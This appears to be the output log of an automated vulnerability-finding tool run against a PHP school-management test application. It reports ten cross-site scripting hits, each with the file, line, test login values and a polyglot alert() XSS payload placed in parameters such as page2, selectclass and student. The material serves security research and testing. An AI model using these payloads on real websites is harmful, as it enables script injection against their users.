//START ATTACKS FOUND -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:95 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/TeacherMain.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" password="teacher" username="teacher" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220633030311/index.php-15207964230.xml alert(String.fromCharCode(88,83,83)) document.classes.submit(); window.status='View Information For class1';return true; alert(String.fromCharCode(88,83,83)) class1 semester2 Semester: ='> ">'> ClassName semester1 ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:34 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ClassSettings.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="1" password="teacher" selectclass="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" username="teacher" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220633032160/index.php-19364393110.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) ">'> ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:48 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ClassSettings.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="1" password="teacher" selectclass="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" username="teacher" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220633032687/index.php-19364393110.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) ">'> ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:87 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/StudentMain.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" password="student" username="student" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220633038750/index.php907458170.xml alert(String.fromCharCode(88,83,83)) window.status='View Information For class2';return true; document.classes.submit(); window.status='View Information For class1';return true; alert(String.fromCharCode(88,83,83)) class1 semester2 Semester: ='> ">'> ClassName semester1 ='/> class2 -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:34 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ViewClassSettings.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="1" password="student" selectclass="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" username="student" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220633044184/index.php-13744643030.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) ">'> ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:46 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ViewClassSettings.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="1" password="student" selectclass="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" username="student" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220633044763/index.php-13744643030.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) ">'> ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:106 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ParentMain.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" password="parent" username="parent" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220633049987/index.php13133884770.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) student1student1 StudentName ='> ">'> ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:13 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ParentViewCourses.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2=5 password="parent" selectclass="1" student="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" username="parent" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220633055156/index.php-6236241020.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) ">'> ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:60 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ParentViewCourses.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2=5 password="parent" selectclass="1" student="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" username="parent" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220633055696/index.php-6236241020.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) ">'> ='/> -------------------------------- /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/index.php vulnerability at line:82 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/SymSchoolmate/ParentViewCourses.php Input: infoupdate=-1 login=1 logout=-1 page="1" page2=5 password="parent" selectclass="1" student="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}" username="parent" Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220633056293/index.php-6236241020.xml alert(String.fromCharCode(88,83,83)) alert(String.fromCharCode(88,83,83)) ">'> ='/> //END ATTACKS FOUND attacks:10 no more inputs to explore ------------------------------------------------ attack count:10 coveredEchos:26 coveredTaintedEchos:10 time:96736